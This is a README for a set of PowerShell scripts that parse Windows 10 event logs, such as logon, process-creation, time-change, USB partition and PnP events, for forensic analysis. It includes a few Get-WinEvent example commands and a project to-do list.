readme.md

Lists

• keywords1 - Powershell script to list all eventlog keywords and the resulting list (from Win10 Pro version 1803)
• keywords2 - Powershell script to list all event specific generated keywords and sample list (from the Win10 Pro version 1803 "Microsoft-Windows-PushNotifications-Platform" event provider)
• OpCodes - Powershell script to list all OpCodes, their Name & DisplayName for AllEvent providers, and 2 csv lists
• 'Task Categories' - Powershell script to list all Task Categories, their Name & DisplayName for AllEvent providers. Full csv list here.

Win 10 (version 1709+) Microsoft-Windows-Partition/Diagnostic.evtx EventID: 1006 parser

• Win 10 Microsoft-Windows-Partition/Diagnostic EventID: 1006 parser - PowerShell script to read a live or offline Microsoft-Windows-Partition/Diagnostic.evtx log and list all the EventID: 1006 entries in a window. Selected rows are saved in a comma separated file (csv). This log has 71 fields with diagnostic information for all Storage Devices (including USB and virtual drives like vhd/vhdxs or images mounted with Arsenal Image Mounter). Among them, the MBR or VBR:

  Part of the results window:

  VBR0 entry (size & bytes) of a USB stick:

  VBR above saved & opened with Active Disk Editor

  Mbr log entry (copy/pasted to HxD)

  GPT Partition table entry of same drive in Active Disk Editor

Win 10 Microsoft-Windows-Kernel-PnP/Configuration.evtx parser

• Win 10 Microsoft-Windows-Kernel-PnP parser - PowerShell script to read a live or offline Microsoft-Windows-Kernel-PnP/Configuration.evtx log and list all the entries. Should also work from Win7 onwards.

  

Win 10 Microsoft-Windows-PowerShell/Operational.evtx EventIDs: 24577,40961, 40962 parser

• Win 10 Microsoft-Windows-PowerShell parser - PowerShell script to read a live or offline Microsoft-Windows-PowerShell/Operational.evtx log and list all the entries. Should also work from Win7 onwards. Curiously, Powershell script execution is not recorded - just console startups. Only Powershell ISE script execution.

  • Event ID: 40961 - PowerShell console is starting up
  • Event ID: 40962 - PowerShell console is ready for user input
  • Event ID: 40962 - Windows PowerShell ISE has started to run script XXX

Win 10 Microsoft-Windows-VolumeSnapshot-Driver/Operational.evtx parser

• Win 10 Microsoft-Windows-VolumeSnapshot-Driver parser - PowerShell script to read a live or offline Microsoft-Windows-VolumeSnapshot-Driver/Operational.evtx log and list all the entries. Should also work from Win7 onwards. (Exploring Volume Shadow (VSS) snapshots (pdf))

  

Win 10 Microsoft-Windows-VHDMP-Operational.evtx parser

• Win 10 Microsoft-Windows-VHDMP-Operational parser - PowerShell script to read a live or offline Microsoft-Windows-VHDMP-Operational.evtx log and list all the entries. (Supports Event IDs: 1,2,50,51)

Win 10 Security.evtx EventID: 4688 parser

• Win 10 Security EventID: 4688 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4688 entries (A new process has been created) .

Win 10 Security.evtx EventID: 4624/4634/4647 parser

• Win 10 Security EventID: 4634/4747 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4624 (An account was successfully logged on), EventID: 4634 (An account was logged off) and EventID: 4647 (User initiated logoff) entries in a window.

Win 10 Security.evtx EventID: 4634/4647 parser

• Win 10 Security EventID: 4634/4747 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4634 (An account was logged off) and EventID: 4647 (User initiated logoff) entries in a window. The main difference between “4647: User initiated logoff.” and 4634 event is that 4647 event is generated when logoff procedure was initiated by specific account using logoff function, and 4634 event shows that session was terminated and no longer exists.

Win 10 Security.evtx EventID: 4624 parser

• Win 10 Security EventID: 4624 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4624 entries (An account was successfully logged on) in a window.

Win 10 Security.evtx EventID: 4648 parser

• Win 10 Security EventID: 4648 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4648 entries (A logon was attempted using explicit credentials) in a window.

Win 10/11 System.evtx EventIDs: 1,12,13,24,20,238 'Microsoft-Windows-Kernel (General & Boot)' parser

• Win 10/11 System.evtx EventIDs: 1,12,13,24,20,238 parser - PowerShell script to list Windows Start-Up/Shutdown & Timechange events.

  

Win 10 Security.evtx EventID: 4616 & System.evtx EventID: 1 parser

• Win 10 Security EventID: 4616 & System EventID: 1 parser - PowerShell script to read both security.evtx and system.evtx logs from a live or offline Win 10 PC, and list all the EventID:1 and EventID: 4616 entries (The system time was changed) in a window. Selected rows are saved in a comma separated file (csv).

  The script (needs to be executed from an Administrator console).

  • Event Providers (type the following in a powershell prompt to see the event template):

    • "Microsoft-Windows-Kernel-General" (ID: 1)
      (Get-WinEvent -ListProvider "Microsoft-Windows-Kernel-General").Events|Where-Object {$_.Id -eq 1}
      

      • Event Reason Nr#:
        1 = An application or system component changed the time
        2 = System time synchronized with the hardware clock
        3 = System time adjusted to the new time zone

    • Event Provider Task Descriptions:
      (Get-WinEvent -Listprovider 'Microsoft-Windows-Kernel-General' -ErrorAction SilentlyContinue).Tasks
      
      Example of the above:
      
      

    • "Microsoft-Windows-Security-Auditing" (ID: 4616)
      (Get-WinEvent -ListProvider "Microsoft-Windows-Security-Auditing").Events|Where-Object {$_.Id -eq 4616}

Win 10 Microsoft-Windows-Winlogon/Operational.evtx parser

• Win 10 Microsoft-Windows-Winlogon parser - PowerShell script to read a live or offline Microsoft-Windows-Winlogon/Operational.evtx log and list all the relevant entries in a window.

Win 10 Security.evtx EventID: 4616 parser

• Win 10 Security EventID: 4616 parser - PowerShell script to read a live or offline security.evtx log and list all the EventID: 4616 entries (The system time was changed) in a window. Selected rows are saved in a comma separated file (csv).

  The script (needs to be executed from an Administrator console) will parse the following information for any 4616 event ID:

  • Field	Description
    Time Created	DateTime the event was recorded
    EventID	Record ID of the Event
    PID	Process ID
    ThreadID	Thread ID
    User Name	UserName associated with the event
    SID	Security descriptor
    Domain Name	Domain Name
    New Time	New Time
    Previous Time	Previous Time
    Change	Difference between New and Previous times
    Process Name	The process that initiated the Time change

    

  • Are Windows timezone written in registry reliable?

  • tzutil /l : List timezones

  • Finding Advanced Attacks and Malware With Only 6 Windows EventID’s (pdf)

Windows Security Audit Events with message schema spreadsheet from Microsoft.

eof

---

Note: Old Windows event IDs can be converted to new event IDs by adding 4096 to the Event ID
eg: 528 (Successful Logon) + 4096 = 4624

---

 - To Do:
   - [X] [List all event log *'keywords'*](keywords.md)
   - [X] [List all eventlog-generated *'keywords'*](keywords2.md)
   - [X] List all [OpCodes](OpCodes.md) 
   - [X] List all [Task Categories](https://github.com/kacos2000/Win10/blob/master/EventLogs/Listprovider_Task_Categories.csv) 
   - [X] Parse EventID 4616
   - [X] Parse EventID 4624/4634/4647 together 
   - [X] Parse EventIDs 4624/4528/4540 (Audit Logon = Success & Failure)
   - [X] Parse EventIDs 4634/4647 (An account was logged off/User initiated logoff)
   - [X] Parse Microsoft-Windows-Winlogon/Operational.evtx
   - [X] Check / Parse EventID 4625
   - [X] Check / Parse EventID 4648
   - [ ] Check / Parse EventIDs 4663/4567 (Audit File	System = Success, (Audit Registry = Success ))
   - [ ] Check / Parse EventID 4675
   - [X] Check / Parse EventID 4688 (Audit Process Creation =	Success)
   - [ ] Check / Parse EventID [4720](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4720)): A user account was created
   - [ ] Check / Parse EventID [4726](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4726)): A user account was deleted
   - [ ] Check / Parse EventIDs 5140/5560 (Audit File	Share	=	Success )
   - [ ] Check / Parse EventID 5156 (Audit Filtering Platform Connection = Success)
   - [ ] Check / Parse EventIDs 7045/7040 
   - [ ] ~~Correlate entries in EventIDs 4616, 4624, 4688 etc~~
   - [X] [Parse EventLog Microsoft-Windows-PushNotification-Platform/Operational.evtx](https://github.com/kacos2000/Win10/blob/master/Notifications/wpn.ps1)
   - [X] Parse Microsoft-Windows-Kernel-PnP/Configuration.evtx      
   - [X] Parse Microsoft-Windows-VolumeSnapshot-Driver/Operational.evtx
   - [X] Parse Microsoft-Windows-VHDMP-Operational.evtx       
   - [X] Parse Microsoft-Windows-PowerShell/Operational.evtx
   - [X] Check /Parse EventID 1006 of Microsoft-Windows-Partition/Diagnostic.evtx [(USB Device Tracking ..)](https://df-stream.com/2018/07/partition-diagnostic-event-log-and-usb-device-tracking-p2/)